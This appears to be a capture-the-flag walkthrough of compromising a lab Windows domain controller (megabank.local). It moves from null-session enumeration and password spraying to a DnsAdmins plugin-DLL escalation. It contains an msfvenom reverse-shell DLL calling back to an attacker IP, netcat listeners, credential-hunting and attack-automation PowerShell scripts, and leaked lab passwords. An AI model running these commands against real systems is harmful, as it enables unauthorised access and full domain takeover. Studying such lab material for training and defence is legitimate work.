53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
Judging by the open ports (DNS, Kerberos, LDAP/Global Catalog, SMB, ADWS, WinRM), the server is a domain controller.
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-30 09:11:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2024-10-30T02:12:23-07:00
|_clock-skew: mean: 2h14m33s, deviation: 4h02m30s, median: -5m27s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-30T09:12:24
|_ start_date: 2024-10-30T06:31:34
The service scan also gives us the FQDN (Resolute.megabank.local), the domain and forest name (megabank.local), and the OS build (Windows Server 2016, 14393). Add the hostname and domain to /etc/hosts and point /etc/resolv.conf at the DC so Kerberos and LDAP tooling can resolve names.
SMB accepts a null session (empty username and password), so I listed the domain users with the --users flag and the full list comes back:
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc smb megabank.local -u '' -p '' --users
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\:
SMB 10.10.10.169 445 RESOLUTE -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.169 445 RESOLUTE Administrator 2024-10-30 09:15:02 0 Built-in account for administering the computer/domain
SMB 10.10.10.169 445 RESOLUTE Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.169 445 RESOLUTE krbtgt 2019-09-25 13:29:12 0 Key Distribution Center Service Account
SMB 10.10.10.169 445 RESOLUTE DefaultAccount <never> 0 A user account managed by the system.
SMB 10.10.10.169 445 RESOLUTE ryan 2024-10-30 09:15:02 0
SMB 10.10.10.169 445 RESOLUTE marko 2019-09-27 13:17:14 0 Account created. Password set to Welcome123!
SMB 10.10.10.169 445 RESOLUTE sunita 2019-12-03 21:26:29 0
SMB 10.10.10.169 445 RESOLUTE abigail 2019-12-03 21:27:30 0
SMB 10.10.10.169 445 RESOLUTE marcus 2019-12-03 21:27:59 0
SMB 10.10.10.169 445 RESOLUTE sally 2019-12-03 21:28:29 0
SMB 10.10.10.169 445 RESOLUTE fred 2019-12-03 21:29:01 0
SMB 10.10.10.169 445 RESOLUTE angela 2019-12-03 21:29:43 0
SMB 10.10.10.169 445 RESOLUTE felicia 2019-12-03 21:30:53 0
SMB 10.10.10.169 445 RESOLUTE gustavo 2019-12-03 21:31:42 0
SMB 10.10.10.169 445 RESOLUTE ulf 2019-12-03 21:32:19 0
SMB 10.10.10.169 445 RESOLUTE stevie 2019-12-03 21:33:13 0
SMB 10.10.10.169 445 RESOLUTE claire 2019-12-03 21:33:44 0
SMB 10.10.10.169 445 RESOLUTE paulo 2019-12-03 21:34:46 0
SMB 10.10.10.169 445 RESOLUTE steve 2019-12-03 21:35:25 0
SMB 10.10.10.169 445 RESOLUTE annette 2019-12-03 21:36:55 0
SMB 10.10.10.169 445 RESOLUTE annika 2019-12-03 21:37:23 0
SMB 10.10.10.169 445 RESOLUTE per 2019-12-03 21:38:12 0
SMB 10.10.10.169 445 RESOLUTE claude 2019-12-03 21:39:56 0
SMB 10.10.10.169 445 RESOLUTE melanie 2024-10-30 09:15:02 0
SMB 10.10.10.169 445 RESOLUTE zach 2019-12-04 10:39:27 0
SMB 10.10.10.169 445 RESOLUTE simon 2019-12-04 10:39:58 0
SMB 10.10.10.169 445 RESOLUTE naoki 2019-12-04 10:40:44 0
I save the usernames to SMBUsers.txt, one per line, as input for the Kerberos and password-spraying steps.
AS-REP Roasting against that list finds nothing: no account has pre-authentication disabled. The three KDC_ERR_CLIENT_REVOKED errors correspond to Guest, krbtgt and DefaultAccount, which are disabled accounts rather than roastable ones.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-GetNPUsers megabank.local/'' -usersfile SMBUsers.txt -dc-ip 10.10.10.169
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:163: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
MSRPC is equally permissive: an anonymous bind with rpcclient succeeds and the SAMR queries are allowed, so a null session can enumerate domain information and accounts.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# rpcclient -U "" -N megabank.local
rpcclient $> querydominfo
Domain: MEGABANK
Server:
Comment:
Total Users: 79
Total Groups: 0
Total Aliases: 0
Sequence No: 1
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
querydispinfo returns the account details, including the description field. The description for marko says the account was created with its password set to Welcome123!.
rpcclient $> querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
So I spray Welcome123! against every account in SMBUsers.txt to see who still uses it. Before spraying a real domain, check the lockout policy first (nxc can print it with --pass-pol); one password against each user is a single attempt per account, which stays under any sane threshold. --continue-on-success keeps going after the first valid hit instead of stopping.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc smb megabank.local -u SMBUsers.txt -p 'Welcome123!' --continue-on-success
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
The password works for melanie, even though marko, whose description held it, no longer accepts it. Checking the credential against WinRM with nxc shows melanie can log in remotely (Pwn3d!), so evil-winrm gives us a shell as melanie.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc winrm megabank.local -u melanie -p 'Welcome123!'
WINRM 10.10.10.169 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
┌──(root㉿kali)-[~/Pentest/Machine]
└─# evil-winrm -i megabank.local -u melanie -p Welcome123!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
As always after initial access, I check privileges and group memberships first, then hunt for PowerShell history. A recursive search turns up a PowerShell transcript (a full session recording, not the PSReadLine history file) under C:\PSTranscripts. It has the hidden and read-only attributes set (-arh--), which is why a plain directory listing misses it and -Force is needed:
*Evil-WinRM* PS C:\Users\melanie\Documents> Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue -Filter "*PowerShell*.txt"
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
I read the transcript, redirect its contents into ps.txt, and pull that file back to Kali with evil-winrm's download command.
*Evil-WinRM* PS C:\Users\melanie\Documents> cat C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt > ps.txt
*Evil-WinRM* PS C:\Users\melanie\Documents> download ps.txt
Info: Downloading C:\Users\melanie\Documents\ps.txt to ps.txt
Info: Download successful!
The transcript records an attempt to map an SMB share as ryan, with the password hard-coded on the command line:
ryan : Serv3r4Admin4cc123!
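The transcript above was found by filename and read by hand. The following is an added example, not code from the original writeup, that automates the same hunt from the evil-winrm session: it walks the transcript directory and every user's PSReadLine history and greps them for the command shapes that usually carry a cleartext secret. The root paths, the regex patterns and the function name are my own assumptions; the patterns are deliberately loose and produce hits to triage, not confirmed credentials.

```powershell
# Added example: hunt PowerShell transcripts and console history for hard-coded
# credentials after landing in a low-privilege shell. Assumptions: transcripts
# live under C:\PSTranscripts (as on this host) and PSReadLine history under each
# profile; the patterns below are ours and will miss other credential formats.

function Find-CredentialLeaks {
    param(
        [string[]] $Roots = @('C:\PSTranscripts', 'C:\Users')
    )
    # Command shapes that commonly carry a cleartext secret in operator scripts.
    # Single-quoted strings: backslashes are literal, '' is one quote.
    $patterns = @(
        'net\s+use\b.*\\\\[^\s]+\s+\S+',            # net use X: \\srv\share <pw> /user:...
        'ConvertTo-SecureString\s+[''"][^''"]+',     # literal password converted in-line
        '-Password\s+[''"]?\S+',                     # -Password '...' on any cmdlet
        'cmdkey\s+.*?/pass:\S+',                     # stored Windows credentials
        'Invoke-Command\b.*-Credential\s+\S+'        # remoting with an inline credential
    )

    # Transcripts are often hidden (as here), so -Force is required.
    $files = foreach ($root in $Roots) {
        Get-ChildItem -Path $root -Recurse -Force -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -like 'PowerShell_transcript*.txt' -or
                           $_.Name -eq 'ConsoleHost_history.txt' }
    }

    foreach ($f in ($files | Sort-Object FullName -Unique)) {
        Select-String -Path $f.FullName -Pattern $patterns -AllMatches |
            ForEach-Object {
                [pscustomobject]@{
                    File = $_.Path
                    Line = $_.LineNumber
                    Hit  = $_.Line.Trim()
                }
            }
    }
}

# Usage from the evil-winrm session:
Find-CredentialLeaks | Format-Table -AutoSize -Wrap
```

Each hit is reported with file and line number so the surrounding context (the share being mapped, the account the command ran under) can be read from the transcript itself rather than guessed from the match.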
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc winrm megabank.local -u ryan -p 'Serv3r4Admin4cc123!'
WINRM 10.10.10.169 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
┌──(root㉿kali)-[~/Pentest/Machine]
└─# evil-winrm -i megabank.local -u ryan -p 'Serv3r4Admin4cc123!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan
ryan is also a member of Remote Management Users, so WinRM works for this account too.
More importantly, whoami /all shows ryan is a member of DnsAdmins:
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
DnsAdmins is the group that administers the DNS server role. A member can change the server's plugin DLL setting (ServerLevelPluginDll) to an arbitrary path, host a malicious DLL on a share we control, and have the DNS service load it on restart. dns.exe runs as SYSTEM, so the DLL runs as SYSTEM. Two caveats: restarting the service requires stop/start rights on the DNS service, which DnsAdmins membership does not grant by itself (ryan has them on this box), and the plugin setting persists in the registry, so the DLL is loaded on every DNS start until the setting is cleared.
For the full background, see the article referenced below.
First, build the malicious DLL with msfvenom:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 -f dll > rev.dll
Then host the DLL on an SMB share so the DC can fetch it:
impacket-smbserver share -smb2support .
The payload calls back to port 4444, so start a listener on that port:
nc -lvnp 4444
Finally, on the target, point the DNS server's plugin DLL setting at the Kali share and restart the dns service with sc.exe:
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.21\share\rev.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 644
FLAGS
On restart the DNS service connects to the Kali SMB server to fetch the DLL, and the connection shows up in the smbserver terminal. Note that it authenticates as the machine account RESOLUTE$, and impacket-smbserver prints its NetNTLMv2 response. A machine account password is long and random, so that hash is not practically crackable, but it confirms the request is coming from the DC itself.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-smbserver share -smb2support .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,57920)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:c4cf63c48f5e74889f9771b7e0e747f1:010100000000000000d5ad10b02adb019ab1416c88401bcb00000000010010004c004100720078007300490077006300030010004c00410072007800730049007700630002001000650076005300670072006a005400550004001000650076005300670072006a00540055000700080000d5ad10b02adb0106000400020000000800300030000000000000000000000000400000f6a498ccbba2aaa00cd38aa8e271e8ea695faac0038a4ca3c3730c2b4795de0f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320031000000000000000000
The service then loads the DLL, the reverse shell payload runs, and the waiting listener receives a SYSTEM shell. The dns service is left in START_PENDING while the payload runs, so name resolution on the DC is down until the plugin setting is cleared and the service is restarted cleanly.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.169] 57922
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
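The dnscmd and sc.exe steps above work, but on a real engagement you want to know what the setting was before you touched it, wait for the stop to actually finish before starting, and put things back afterwards. The following is an added example, not code from the original writeup, wrapping the same procedure with those checks. The share path is the one used above; the registry location is where dnscmd /config /serverlevelplugindll writes its value, and the cleanup form of that command (no path argument) and the function names are my assumptions.

```powershell
# Added example: the ServerLevelPluginDll abuse from the writeup with a recorded
# previous value, a real wait for the stop, and a cleanup step.
# Assumptions: our share \\10.10.14.21\share\rev.dll (from the text); the current
# user has stop/start rights on the dns service (ryan does here; DnsAdmins alone
# does not grant them); the registry path below is where dnscmd stores the value.

$DnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$PluginDll = '\\10.10.14.21\share\rev.dll'

function Get-DnsPluginDll {
    # Current plugin DLL, or $null when none is set (or the key is not readable).
    (Get-ItemProperty -Path $DnsParams -Name ServerLevelPluginDll `
        -ErrorAction SilentlyContinue).ServerLevelPluginDll
}

function Restart-DnsService {
    sc.exe stop dns | Out-Null
    # Wait for the stop to complete instead of racing 'start' against STOP_PENDING.
    $deadline = (Get-Date).AddSeconds(30)
    while ((Get-Service dns).Status -ne 'Stopped' -and (Get-Date) -lt $deadline) {
        Start-Sleep -Seconds 1
    }
    sc.exe start dns | Out-Null
}

function Invoke-DnsPluginLoad {
    $previous = Get-DnsPluginDll
    Write-Host "[*] Previous ServerLevelPluginDll: '$previous'"
    dnscmd /config /serverlevelplugindll $PluginDll | Out-Null
    if ($LASTEXITCODE -ne 0) {
        throw 'dnscmd failed to set the plugin path; check DnsAdmins membership'
    }
    # Best-effort readback; a $null here only means the key is not readable to us.
    $now = Get-DnsPluginDll
    if ($now -and $now -ne $PluginDll) { throw "Plugin path is '$now', not ours" }
    # dns.exe (SYSTEM) now authenticates to our share and loads rev.dll.
    Restart-DnsService
    return $previous
}

function Remove-DnsPluginDll {
    # Cleanup: the same command with no path clears the value (assumption noted
    # in the lead-in), then a clean restart stops the service loading our DLL.
    dnscmd /config /serverlevelplugindll | Out-Null
    Restart-DnsService
}

# Usage from the evil-winrm session as ryan, with the listener already running:
# $old = Invoke-DnsPluginLoad      # catch the SYSTEM shell on nc, then:
# Remove-DnsPluginDll              # restore DNS on the DC before leaving
```

Record the value returned by Invoke-DnsPluginLoad in your notes; if a plugin DLL was legitimately configured before, restore that path instead of clearing the setting.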